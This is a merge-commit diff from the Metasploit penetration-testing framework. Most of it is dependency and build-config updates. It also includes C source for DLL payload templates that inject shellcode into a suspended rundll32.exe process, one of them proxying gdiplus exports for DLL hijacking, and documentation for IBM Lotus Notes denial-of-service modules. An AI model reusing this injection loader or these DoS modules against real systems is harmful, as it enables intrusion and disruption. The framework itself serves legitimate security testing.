Merge remote-tracking branch 'upstream/master'

MS-2855/keylogger-mettle-extension
Pushpam Kumar 2017-11-17 00:16:43 +05:30
commit c3c8ec761d
584 changed files with 9615 additions and 1393 deletions

View File

@ -1 +1 @@
2.4.1
2.4.2

View File

@ -12,8 +12,8 @@ addons:
language: ruby
rvm:
- '2.2'
- '2.3.4'
- '2.4.1'
- '2.3.5'
- '2.4.2'
env:
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
@ -21,9 +21,15 @@ env:
matrix:
fast_finish: true
jobs:
# build docker image
include:
- rvm: ruby-head
env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build"
- env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build" DOCKER="true"
# we do not need any setup
before_install: skip
install: skip
before_script: skip
before_install:
- "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
- rake --version
@ -42,7 +48,8 @@ before_script:
- git diff --exit-code db/schema.rb
script:
- echo "${CMD}"
- bash -c "${CMD}"
# we need travis_wait because the Docker build job can take longer than 10 minutes
- if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
notifications:
irc: "irc.freenode.org#msfnotify"

View File

@ -1,4 +1,4 @@
FROM ruby:2.4.1-alpine
FROM ruby:2.4.2-alpine
MAINTAINER Rapid7
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
@ -36,7 +36,8 @@ RUN apk update && \
ncurses-dev \
git \
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
&& gem update --system \
# this currently fails: https://github.com/rubygems/rubygems/issues/2064
# && gem update --system \
&& gem install bundler \
&& bundle install --system $BUNDLER_ARGS \
&& apk del .ruby-builddeps \

View File

@ -19,8 +19,10 @@ group :development do
# module documentation
gem 'octokit'
# Metasploit::Aggregator external session proxy
# Disabled for now for crypttlv updates
# gem 'metasploit-aggregator'
gem 'metasploit-aggregator' if [
'x86-mingw32', 'x64-mingw32',
'x86_64-linux', 'x86-linux',
'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
end
group :development, :test do

View File

@ -1,7 +1,7 @@
PATH
remote: .
specs:
metasploit-framework (4.16.8)
metasploit-framework (4.16.18)
actionpack (~> 4.2.6)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@ -17,9 +17,9 @@ PATH
metasploit-concern
metasploit-credential
metasploit-model
metasploit-payloads (= 1.3.8)
metasploit-payloads (= 1.3.14)
metasploit_data_models
metasploit_payloads-mettle (= 0.2.2)
metasploit_payloads-mettle (= 0.2.5)
msgpack
nessus_rest
net-ssh
@ -49,7 +49,7 @@ PATH
rex-mime
rex-nop
rex-ole
rex-powershell (< 0.1.73)
rex-powershell (< 0.1.78)
rex-random_identifier
rex-registry
rex-rop_builder
@ -73,27 +73,27 @@ GEM
remote: https://rubygems.org/
specs:
Ascii85 (1.0.2)
actionpack (4.2.9)
actionview (= 4.2.9)
activesupport (= 4.2.9)
actionpack (4.2.10)
actionview (= 4.2.10)
activesupport (= 4.2.10)
rack (~> 1.6)
rack-test (~> 0.6.2)
rails-dom-testing (~> 1.0, >= 1.0.5)
rails-html-sanitizer (~> 1.0, >= 1.0.2)
actionview (4.2.9)
activesupport (= 4.2.9)
actionview (4.2.10)
activesupport (= 4.2.10)
builder (~> 3.1)
erubis (~> 2.7.0)
rails-dom-testing (~> 1.0, >= 1.0.5)
rails-html-sanitizer (~> 1.0, >= 1.0.3)
activemodel (4.2.9)
activesupport (= 4.2.9)
activemodel (4.2.10)
activesupport (= 4.2.10)
builder (~> 3.1)
activerecord (4.2.9)
activemodel (= 4.2.9)
activesupport (= 4.2.9)
activerecord (4.2.10)
activemodel (= 4.2.10)
activesupport (= 4.2.10)
arel (~> 6.0)
activesupport (4.2.9)
activesupport (4.2.10)
i18n (~> 0.7)
minitest (~> 5.1)
thread_safe (~> 0.3, >= 0.3.4)
@ -102,37 +102,65 @@ GEM
public_suffix (>= 2.0.2, < 4.0)
afm (0.2.2)
arel (6.0.4)
arel-helpers (2.4.0)
arel-helpers (2.5.0)
activerecord (>= 3.1.0, < 6)
backports (3.8.0)
backports (3.10.3)
bcrypt (3.1.11)
bcrypt_pbkdf (1.0.0)
bindata (2.4.1)
bit-struct (0.16)
builder (3.2.3)
coderay (1.1.2)
concurrent-ruby (1.0.5)
crass (1.0.3)
diff-lcs (1.3)
dnsruby (1.60.2)
docile (1.1.5)
erubis (2.7.0)
factory_girl (4.8.0)
factory_girl (4.9.0)
activesupport (>= 3.0.0)
factory_girl_rails (4.8.0)
factory_girl (~> 4.8.0)
factory_girl_rails (4.9.0)
factory_girl (~> 4.9.0)
railties (>= 3.0.0)
faraday (0.13.1)
multipart-post (>= 1.2, < 3)
ffi (1.9.18)
filesize (0.1.1)
fivemat (1.3.5)
google-protobuf (3.5.0)
googleapis-common-protos-types (1.0.1)
google-protobuf (~> 3.0)
googleauth (0.6.2)
faraday (~> 0.12)
jwt (>= 1.4, < 3.0)
logging (~> 2.0)
memoist (~> 0.12)
multi_json (~> 1.11)
os (~> 0.9)
signet (~> 0.7)
grpc (1.7.2)
google-protobuf (~> 3.1)
googleapis-common-protos-types (~> 1.0.0)
googleauth (>= 0.5.1, < 0.7)
hashery (2.1.2)
i18n (0.8.6)
i18n (0.9.1)
concurrent-ruby (~> 1.0)
jsobfu (0.4.2)
rkelly-remix
json (2.1.0)
loofah (2.0.3)
jwt (2.1.0)
little-plugger (1.1.4)
logging (2.2.2)
little-plugger (~> 1.1)
multi_json (~> 1.10)
loofah (2.1.1)
crass (~> 1.0.2)
nokogiri (>= 1.5.9)
memoist (0.16.0)
metasm (1.0.3)
metasploit-aggregator (1.0.0)
grpc
rex-arch
metasploit-concern (2.0.5)
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
@ -150,7 +178,7 @@ GEM
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-payloads (1.3.8)
metasploit-payloads (1.3.14)
metasploit_data_models (2.0.15)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@ -161,22 +189,24 @@ GEM
postgres_ext
railties (~> 4.2.6)
recog (~> 2.0)
metasploit_payloads-mettle (0.2.2)
method_source (0.8.2)
mini_portile2 (2.2.0)
metasploit_payloads-mettle (0.2.5)
method_source (0.9.0)
mini_portile2 (2.3.0)
minitest (5.10.3)
msgpack (1.1.0)
multi_json (1.12.2)
multipart-post (2.0.0)
nessus_rest (0.1.6)
net-ssh (4.2.0)
network_interface (0.0.2)
nexpose (7.0.1)
nokogiri (1.8.0)
mini_portile2 (~> 2.2.0)
nexpose (7.1.1)
nokogiri (1.8.1)
mini_portile2 (~> 2.3.0)
octokit (4.7.0)
sawyer (~> 0.8.0, >= 0.5.3)
openssl-ccm (1.2.1)
openvas-omp (0.0.4)
os (0.9.6)
packetfu (1.1.13)
pcaprub
patch_finder (1.0.2)
@ -193,11 +223,10 @@ GEM
activerecord (>= 4.0.0)
arel (>= 4.0.1)
pg_array_parser (~> 0.0.9)
pry (0.10.4)
pry (0.11.3)
coderay (~> 1.1.0)
method_source (~> 0.8.1)
slop (~> 3.4)
public_suffix (3.0.0)
method_source (~> 0.9.0)
public_suffix (3.0.1)
rack (1.6.8)
rack-test (0.6.3)
rack (>= 1.0)
@ -209,21 +238,21 @@ GEM
rails-deprecated_sanitizer (>= 1.0.1)
rails-html-sanitizer (1.0.3)
loofah (~> 2.0)
railties (4.2.9)
actionpack (= 4.2.9)
activesupport (= 4.2.9)
railties (4.2.10)
actionpack (= 4.2.10)
activesupport (= 4.2.10)
rake (>= 0.8.7)
thor (>= 0.18.1, < 2.0)
rake (12.1.0)
rake (12.3.0)
rb-readline (0.5.5)
rbnacl (4.0.2)
ffi
rbnacl-libsodium (1.0.13)
rbnacl-libsodium (1.0.15.1)
rbnacl (>= 3.0.1)
recog (2.1.15)
recog (2.1.16)
nokogiri
redcarpet (3.4.0)
rex-arch (0.1.11)
rex-arch (0.1.13)
rex-text
rex-bin_tools (0.1.4)
metasm
@ -236,7 +265,7 @@ GEM
metasm
rex-arch
rex-text
rex-exploitation (0.1.14)
rex-exploitation (0.1.15)
jsobfu
metasm
rex-arch
@ -249,7 +278,7 @@ GEM
rex-arch
rex-ole (0.1.6)
rex-text
rex-powershell (0.1.72)
rex-powershell (0.1.77)
rex-random_identifier
rex-text
rex-random_identifier (0.1.4)
@ -259,7 +288,7 @@ GEM
metasm
rex-core
rex-text
rex-socket (0.1.8)
rex-socket (0.1.9)
rex-core
rex-sslscan (0.1.5)
rex-core
@ -270,29 +299,29 @@ GEM
rex-zip (0.1.3)
rex-text
rkelly-remix (0.0.7)
rspec (3.6.0)
rspec-core (~> 3.6.0)
rspec-expectations (~> 3.6.0)
rspec-mocks (~> 3.6.0)
rspec-core (3.6.0)
rspec-support (~> 3.6.0)
rspec-expectations (3.6.0)
rspec (3.7.0)
rspec-core (~> 3.7.0)
rspec-expectations (~> 3.7.0)
rspec-mocks (~> 3.7.0)
rspec-core (3.7.0)
rspec-support (~> 3.7.0)
rspec-expectations (3.7.0)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.6.0)
rspec-mocks (3.6.0)
rspec-support (~> 3.7.0)
rspec-mocks (3.7.0)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.6.0)
rspec-rails (3.6.1)
rspec-support (~> 3.7.0)
rspec-rails (3.7.1)
actionpack (>= 3.0)
activesupport (>= 3.0)
railties (>= 3.0)
rspec-core (~> 3.6.0)
rspec-expectations (~> 3.6.0)
rspec-mocks (~> 3.6.0)
rspec-support (~> 3.6.0)
rspec-core (~> 3.7.0)
rspec-expectations (~> 3.7.0)
rspec-mocks (~> 3.7.0)
rspec-support (~> 3.7.0)
rspec-rerun (1.1.0)
rspec (~> 3.0)
rspec-support (3.6.0)
rspec-support (3.7.0)
ruby-rc4 (0.1.5)
ruby_smb (0.0.18)
bindata
@ -303,21 +332,25 @@ GEM
sawyer (0.8.1)
addressable (>= 2.3.5, < 2.6)
faraday (~> 0.8, < 1.0)
signet (0.8.1)
addressable (~> 2.3)
faraday (~> 0.9)
jwt (>= 1.5, < 3.0)
multi_json (~> 1.10)
simplecov (0.15.1)
docile (~> 1.1.0)
json (>= 1.8, < 3)
simplecov-html (~> 0.10.0)
simplecov-html (0.10.2)
slop (3.6.0)
sqlite3 (1.3.13)
sshkey (1.9.0)
thor (0.20.0)
thread_safe (0.3.6)
timecop (0.9.1)
ttfunk (1.5.1)
tzinfo (1.2.3)
tzinfo (1.2.4)
thread_safe (~> 0.1)
tzinfo-data (1.2017.2)
tzinfo-data (1.2017.3)
tzinfo (>= 1.0.0)
windows_error (0.1.2)
xdr (2.0.0)
@ -332,6 +365,7 @@ PLATFORMS
DEPENDENCIES
factory_girl_rails
fivemat
metasploit-aggregator
metasploit-framework!
octokit
pry
@ -344,4 +378,4 @@ DEPENDENCIES
yard
BUNDLED WITH
1.15.4
1.16.0

View File

@ -84,7 +84,7 @@ rex-arch, 0.1.9, "New BSD"
rex-bin_tools, 0.1.4, "New BSD"
rex-core, 0.1.11, "New BSD"
rex-encoder, 0.1.4, "New BSD"
rex-exploitation, 0.1.14, "New BSD"
rex-exploitation, 0.1.15, "New BSD"
rex-java, 0.1.5, "New BSD"
rex-mime, 0.1.5, "New BSD"
rex-nop, 0.1.1, "New BSD"

View File

@ -1,16 +0,0 @@
#!/bin/sh
rm -f *.o *.dll
CCx86="i686-w64-mingw32"
CCx64="x86_64-w64-mingw32"
${CCx64}-gcc -m64 -c -Os template.c -Wall -shared
${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll
${CCx64}-strip -s temp.dll -o template_x64_windows.dll
rm -f temp.dll *.o
${CCx86}-gcc -c -Os template.c -Wall -shared
${CCx86}-dllwrap --def template.def *.o -o temp.dll
${CCx86}-strip -s temp.dll -o template_x86_windows.dll
rm -f temp.dll *.o

View File

@ -1,95 +0,0 @@
// Based on https://github.com/rapid7/metasploit-framework/tree/cac890a797d0d770260074dfe703eb5cfb63bd46/data/templates/src/pe/dll
// - removed ExitThread(0) to prevent an Explorer crash
// - added Mutex to prevent invoking payload multiple times (at least try)
#include <windows.h>
#include "template.h"
void inline_bzero(void *p, size_t l)
{
BYTE *q = (BYTE *)p;
size_t x = 0;
for (x = 0; x < l; x++)
*(q++) = 0x00;
}
void ExecutePayload(void);
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
switch (dwReason)
{
case DLL_PROCESS_ATTACH:
ExecutePayload();
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}
void ExecutePayload(void)
{
PROCESS_INFORMATION pi;
STARTUPINFO si;
CONTEXT ctx;
LPVOID ep;
HANDLE hMutex;
SECURITY_ATTRIBUTES MutexAttributes;
inline_bzero(&MutexAttributes, sizeof(MutexAttributes));
MutexAttributes.nLength = sizeof(MutexAttributes);
MutexAttributes.bInheritHandle = TRUE; // inherit the handle
hMutex = CreateMutex(&MutexAttributes, TRUE, "MsfMutex");
if(hMutex == NULL)
{
return;
}
if(GetLastError() == ERROR_ALREADY_EXISTS)
{
CloseHandle(hMutex);
return;
}
if(GetLastError() == ERROR_ACCESS_DENIED)
{
CloseHandle(hMutex);
return;
}
// Start up the payload in a new process
inline_bzero(&si, sizeof(si));
si.cb = sizeof(si);
// Create a suspended process, write shellcode into stack, make stack RWX, resume it
if(CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
GetThreadContext(pi.hThread, &ctx);
ep = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
#ifdef _WIN64
ctx.Rip = (DWORD64)ep;
#else
ctx.Eip = (DWORD)ep;
#endif
SetThreadContext(pi.hThread, &ctx);
ResumeThread(pi.hThread);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
CloseHandle(hMutex);
}

View File

@ -1,3 +0,0 @@
#define SCSIZE 2048
unsigned char code[SCSIZE] = "PAYLOAD:";

BIN
data/exploits/cve-2017-8464/template_x64_windows.dll Executable file → Normal file

Binary file not shown.

BIN
data/exploits/cve-2017-8464/template_x86_windows.dll Executable file → Normal file

Binary file not shown.

Binary file not shown.

Binary file not shown.

View File

@ -0,0 +1,24 @@
#
# XXX: NOTE: this will only compile the x86 version.
#
# To compile the x64 version, use:
# C:\> call "c:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\vcvarsall.bat" amd64
# C:\> cl.exe -LD /Zl /GS- /DBUILDMODE=2 /link /entry:DllMain kernel32.lib
#
if [ -z "$PREFIX" ]; then
PREFIX=i686-w64-mingw32
fi
rm -f *.o *.dll
$PREFIX-gcc -c template.c
$PREFIX-windres -o rc.o template.rc
$PREFIX-gcc -mdll -o junk.tmp -Wl,--base-file,base.tmp template.o rc.o
rm -f junk.tmp
$PREFIX-dlltool --dllname template_x86_windows.dll --base-file base.tmp --output-exp temp.exp #--def template.def
rm -f base.tmp
$PREFIX-gcc -mdll -o template_x86_windows.dll template.o rc.o -Wl,temp.exp
rm -f temp.exp
$PREFIX-strip template_x86_windows.dll
rm -f *.o

View File

@ -0,0 +1,97 @@
#include <windows.h>
#include "template.h"
/* hand-rolled bzero allows us to avoid including ms vc runtime */
void inline_bzero(void *p, size_t l)
{
BYTE *q = (BYTE *)p;
size_t x = 0;
for (x = 0; x < l; x++)
*(q++) = 0x00;
}
void ExecutePayload(void);
BOOL WINAPI
DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
switch (dwReason)
{
case DLL_PROCESS_ATTACH:
ExecutePayload();
break;
case DLL_PROCESS_DETACH:
// Code to run when the DLL is freed
break;
case DLL_THREAD_ATTACH:
// Code to run when a thread is created during the DLL's lifetime
break;
case DLL_THREAD_DETACH:
// Code to run when a thread ends normally.
break;
}
return TRUE;
}
void ExecutePayload(void) {
int error;
PROCESS_INFORMATION pi;
STARTUPINFO si;
CONTEXT ctx;
DWORD prot;
LPVOID ep;
// Start up the payload in a new process
inline_bzero( &si, sizeof( si ));
si.cb = sizeof(si);
// Create a suspended process, write shellcode into stack, make stack RWX, resume it
if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {
ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
GetThreadContext(pi.hThread, &ctx);
ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
#ifdef _WIN64
ctx.Rip = (DWORD64)ep;
#else
ctx.Eip = (DWORD)ep;
#endif
SetThreadContext(pi.hThread,&ctx);
ResumeThread(pi.hThread);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
// ExitProcess(0);
ExitThread(0);
}
/*
typedef VOID
(NTAPI *PIMAGE_TLS_CALLBACK) (
PVOID DllHandle,
ULONG Reason,
PVOID Reserved
);
VOID NTAPI TlsCallback(
IN PVOID DllHandle,
IN ULONG Reason,
IN PVOID Reserved)
{
__asm ( "int3" );
}
ULONG _tls_index;
PIMAGE_TLS_CALLBACK _tls_cb[] = { TlsCallback, NULL };
IMAGE_TLS_DIRECTORY _tls_used = { 0, 0, (ULONG)&_tls_index, (ULONG)_tls_cb, 1000, 0 };
*/

View File

@ -0,0 +1,40 @@
#define SCSIZE 2048
unsigned char code[SCSIZE] = "PAYLOAD:";
#ifdef _MSC_VER
#pragma comment (linker, "/export:GdipAlloc=c:/windows/system32/gdiplus.GdipAlloc,@34")
#pragma comment (linker, "/export:GdipCloneBrush=c:/windows/system32/gdiplus.GdipCloneBrush,@46")
#pragma comment (linker, "/export:GdipCloneImage=c:/windows/system32/gdiplus.GdipCloneImage,@50")
#pragma comment (linker, "/export:GdipCreateBitmapFromStream=c:/windows/system32/gdiplus.GdipCreateBitmapFromStream,@74")
#pragma comment (linker, "/export:GdipCreateFromHDC=c:/windows/system32/gdiplus.GdipCreateFromHDC,@84")
#pragma comment (linker, "/export:GdipCreateHBITMAPFromBitmap=c:/windows/system32/gdiplus.GdipCreateHBITMAPFromBitmap,@87")
#pragma comment (linker, "/export:GdipCreateLineBrushI=c:/windows/system32/gdiplus.GdipCreateLineBrushI,@97")
#pragma comment (linker, "/export:GdipCreateSolidFill=c:/windows/system32/gdiplus.GdipCreateSolidFill,@122")
#pragma comment (linker, "/export:GdipDeleteBrush=c:/windows/system32/gdiplus.GdipDeleteBrush,@130")
#pragma comment (linker, "/export:GdipDeleteGraphics=c:/windows/system32/gdiplus.GdipDeleteGraphics,@135")
#pragma comment (linker, "/export:GdipDisposeImage=c:/windows/system32/gdiplus.GdipDisposeImage,@143")
#pragma comment (linker, "/export:GdipFillRectangleI=c:/windows/system32/gdiplus.GdipFillRectangleI,@219")
#pragma comment (linker, "/export:GdipFree=c:/windows/system32/gdiplus.GdipFree,@225")
#pragma comment (linker, "/export:GdiplusShutdown=c:/windows/system32/gdiplus.GdiplusShutdown,@608")
#pragma comment (linker, "/export:GdiplusStartup=c:/windows/system32/gdiplus.GdiplusStartup,@609")
#endif
#ifdef __GNUC__
asm (".section .drectve\n\t.ascii \" -export:GdipAlloc=c:/windows/system32/gdiplus.GdipAlloc @34\"");
asm (".section .drectve\n\t.ascii \" -export:GdipCloneBrush=c:/windows/system32/gdiplus.GdipCloneBrush @46\"");
asm (".section .drectve\n\t.ascii \" -export:GdipCloneImage=c:/windows/system32/gdiplus.GdipCloneImage @50\"");
asm (".section .drectve\n\t.ascii \" -export:GdipCreateBitmapFromStream=c:/windows/system32/gdiplus.GdipCreateBitmapFromStream @74\"");
asm (".section .drectve\n\t.ascii \" -export:GdipCreateFromHDC=c:/windows/system32/gdiplus.GdipCreateFromHDC @84\"");
asm (".section .drectve\n\t.ascii \" -export:GdipCreateHBITMAPFromBitmap=c:/windows/system32/gdiplus.GdipCreateHBITMAPFromBitmap @87\"");
asm (".section .drectve\n\t.ascii \" -export:GdipCreateLineBrushI=c:/windows/system32/gdiplus.GdipCreateLineBrushI @97\"");
asm (".section .drectve\n\t.ascii \" -export:GdipCreateSolidFill=c:/windows/system32/gdiplus.GdipCreateSolidFill @122\"");
asm (".section .drectve\n\t.ascii \" -export:GdipDeleteBrush=c:/windows/system32/gdiplus.GdipDeleteBrush @130\"");
asm (".section .drectve\n\t.ascii \" -export:GdipDeleteGraphics=c:/windows/system32/gdiplus.GdipDeleteGraphics @135\"");
asm (".section .drectve\n\t.ascii \" -export:GdipDisposeImage=c:/windows/system32/gdiplus.GdipDisposeImage @143\"");
asm (".section .drectve\n\t.ascii \" -export:GdipFillRectangleI=c:/windows/system32/gdiplus.GdipFillRectangleI @219\"");
asm (".section .drectve\n\t.ascii \" -export:GdipFree=c:/windows/system32/gdiplus.GdipFree @225\"");
asm (".section .drectve\n\t.ascii \" -export:GdiplusShutdown=c:/windows/system32/gdiplus.GdiplusShutdown @608\"");
asm (".section .drectve\n\t.ascii \" -export:GdiplusStartup=c:/windows/system32/gdiplus.GdiplusStartup @609\"");
#endif

Binary file not shown.

Binary file not shown.

View File

@ -0,0 +1,63 @@
## Vulnerable Application
This module exploits a vulnerability in the built-in web-browser of IBM Lotus Notes client application.
JavaScript is used to create an object instance of encode URI within an infinite loop,
leading to a Denial of Service of the IBM Lotus Notes app itself.
Vulnerable app versions include:
* IBM Notes 9.0.1 to 9.0.1 FP8IF1
* IBM Notes 9.0 to 9.0 IF4.
* IBM Notes 8.5.3 to 8.5.3 FP6 IF13.
* IBM Notes 8.5.2 to 8.5.2 FP4 IF3.
* IBM Notes 8.5.1. to 8.5.1 FP5 IF5.
* IBM Notes 8.5 release
Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999385
## Verification
1. Start msfconsole
1. `use auxiliary/dos/http/ibm_lotus_notes.rb`
1. Set `SRVHOST`
1. Set `SRVPORT`
1. run (Server started)
1. Visit server URL in the built-in web-browser of IBM Notes client application
## Scenarios
```
msf > use auxiliary/dos/http/ibm_lotus_notes
msf auxiliary(ibm_lotus_notes) > show options
Module options (auxiliary/dos/http/ibm_lotus_notes):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Auxiliary action:
Name Description
---- -----------
WebServer
msf auxiliary(ibm_lotus_notes) > set SRVHOST 192.168.0.50
SRVHOST => 192.168.0.50
msf auxiliary(ibm_lotus_notes) > set SRVPORT 9092
SRVPORT => 9092
msf auxiliary(ibm_lotus_notes) > run
[*] Auxiliary module execution completed
msf auxiliary(ibm_lotus_notes) >
[*] Using URL: http://192.168.0.50:9092/ImlbHZVXlvTEXYd
[*] Server started.
msf auxiliary(ibm_lotus_notes) >
```
At this point, the target should use the built-in web browser of their IBM Lotus Notes client to navigate to the above "Using URL" value. And then they should see their Notes app become unresponsive.

View File

@ -0,0 +1,67 @@
## Vulnerable Application
This module exploits a vulnerability in the built-in web-browser of IBM Lotus Notes client application.
If a user is persuaded to click on a malicious link, it would open up many file select dialog boxes which,
would cause the client hang and have to be restarted.
Affected Products and Versions
IBM Notes 9.0.1 to 9.0.1 FP8 IF1
IBM Notes 9.0 to 9.0 IF4.
IBM Notes 8.5.3 to 8.5.3 FP6 IF13.
IBM Notes 8.5.2 to 8.5.2 FP4 IF3.
IBM Notes 8.5.1. to 8.5.1 FP5 IF5.
IBM Notes 8.5 release
Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999384
## Verification
Start msfconsole
`use auxiliary/dos/http/ibm_lotus_notes2.rb`
Set `SRVHOST`
Set `SRVPORT`
run (Server started)
Visit server URL in the built-in web-browser of IBM Notes client application
## Scenarios
```
msf > use auxiliary/dos/http/ibm_lotus_notes2
msf auxiliary(ibm_lotus_notes2) > show options
Module options (auxiliary/dos/http/ibm_lotus_notes2):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Auxiliary action:
Name Description
---- -----------
WebServer
msf auxiliary(ibm_lotus_notes2) > set SRVHOST 192.168.0.50
SRVHOST => 192.168.0.50
msf auxiliary(ibm_lotus_notes2) > set SRVPORT 9092
SRVPORT => 9092
msf auxiliary(ibm_lotus_notes2) > run
[*] Auxiliary module execution completed
msf auxiliary(ibm_lotus_notes2) >
[*] Using URL: http://192.168.0.50:9092/mypath
[*] Server started.
msf auxiliary(ibm_lotus_notes2) >
```
At this point, the target should use the built-in web browser of their IBM Lotus Notes client to navigate to the above "Using URL" value. And then they should see their Notes app become unresponsive.

View File

@ -0,0 +1,148 @@
## Vulnerable Application
Any gopher server will work. There seems to only be [a few left](https://en.wikipedia.org/wiki/Gopher_(protocol)#Server_software)
in 2017.
A few options for local installation and testing are below.
### Docker Install
A [dockerized gopher server written in Go](https://hub.docker.com/r/prodhe/gopher/) is available. To install and run this, with content being
served out of a temporary directory in which you'll be left:
```
$ docker pull prodhe/gopher
Using default tag: latest
latest: Pulling from prodhe/gopher
627beaf3eaaf: Already exists
8800e3417eb1: Pull complete
d9f3bcdad0eb: Pull complete
c018073abd26: Pull complete
b2855f535c50: Pull complete
23480a2f73d8: Pull complete
1555a5435ec5: Pull complete
0728d289e0fc: Pull complete
6f6f265b58ee: Pull complete
Digest: sha256:69931d56946d192d9bd155a88b6f365cb276e9edf453129d374e64d244d1edaa
Status: Downloaded newer image for prodhe/gopher:latest
$ cd `mktemp -d`;
$ sudo docker run --rm -d -it --name gopher_test -v `pwd -P`:/public -p 70:70 prodhe/gopher
2017/10/20 16:45:01 Serving /public/ at localhost:70
$ date > test.txt
$ echo HELLO > README.md
```
*NOTE*: Don't forget to `docker stop` the container ID returned from the `docker run` command just run above:
```
$ docker stop X
X
```
### Ubuntu 16.04 Install
First we need to install the server:
```
sudo apt-get install gopher-server
```
Next, we need to build content for the scanner to find. Gopher works off of a `gophermap`, somewhat similar
to a content index page, where files are listed in a menu type system.
```
echo "<html><h1>hello world</h1></html>" | sudo tee /var/gopher/example.html
echo "foobarbaz" | sudo tee /var/gopher/foobar.txt
sudo mkdir /var/gopher/msf
echo "meterpreter rules" | sudo tee /var/gopher/msf/meterp.txt
sudo wget "https://pbs.twimg.com/profile_images/580131056629735424/2ENTk2K2.png" -O /var/gopher/msf/logo.png
echo -ne "gopher custom gophermap\n\nhHello World\t/example.html\t1.1.1.1\t70\n0Foo File\t/foobar.txt\t1.1.1.1\t70\n1msf\t/msf\t1.1.1.1\t70\nhmetasploit homepage\tURL:http://metasploit.com/\n" | sudo tee /var/gopher/gophermap
sudo chmod +r -R /var/gopher
```
In this case we create an html file, text file, a directory with a text file and png file in it. Enough content so its nice to look at.
Next we write our `gophermap` file. The first line is just an intro. After that, we list our files that the client can access.
The format of these lines is: `XSome text here[TAB]/path/to/content[TAB]example.org[TAB]port`. The first character, `X` is the file type
which can be referenced in the table below. The final address (example.org) and PORT are optional.
The following table contains the file types associated with the characters:
| Itemtype | Content |
|----------|---------------------------------|
| 0 | Text file |
| 1 | Directory |
| 2 | CSO name server |
| 3 | Error |
| 4 | Mac HQX filer |
| 5 | PC binary |
| 6 | UNIX uuencoded file |
| 7 | Search server |
| 8 | Telnet Session |
| 9 | Binary File |
| c | Calendar (not in 2.06) |
| e | Event (not in 2.06) |
| g | GIF image |
| h | HTML, Hypertext Markup Language |
| i | inline text type |
| s | Sound |
| I | Image (other than GIF) |
| M | MIME multipart/mixed message |
| T | TN3270 Session |
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: ```use auxiliary/scanner/gopher/gopher_gophermap```
4. Do: ```set rhosts [IPs]```
5. Do: ```run```
6. You should see the gophermap file printed in a parsed format
## Options
**PATH**
It is possible to view content within a directory of the gophermap. If the intial run shows directory `Directory: foobar`,
setting **path** to `/foobar` will enumerate the contents of that folder. Default: [empty string].
## Scenarios
### Docker Gopher Server
```
msf > use auxiliary/scanner/gopher/gopher_gophermap
msf auxiliary(gopher_gophermap) > set RHOSTS localhost
RHOSTS => localhost
msf auxiliary(gopher_gophermap) > run
[+] 127.0.0.1:70 - Text file: README.md
[+] 127.0.0.1:70 - Path: localhost:70/README.md
[+] 127.0.0.1:70 - Text file: test.txt
[+] 127.0.0.1:70 - Path: localhost:70/test.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
### Gopher-server on Ubuntu 16.04
```
msf > use auxiliary/scanner/gopher/gopher_gophermap
msf auxiliary(gopher_gophermap) > set rhosts 1.1.1.1
rhosts => 1.1.1.1
msf auxiliary(gopher_gophermap) > set verbose true
verbose => true
msf auxiliary(gopher_gophermap) > run
[+] 1.1.1.1:70 - gopher custom gophermap
[+] 1.1.1.1:70 -
[+] 1.1.1.1:70 - HTML: Hello World
[+] 1.1.1.1:70 - Path: 1.1.1.1:70/example.html
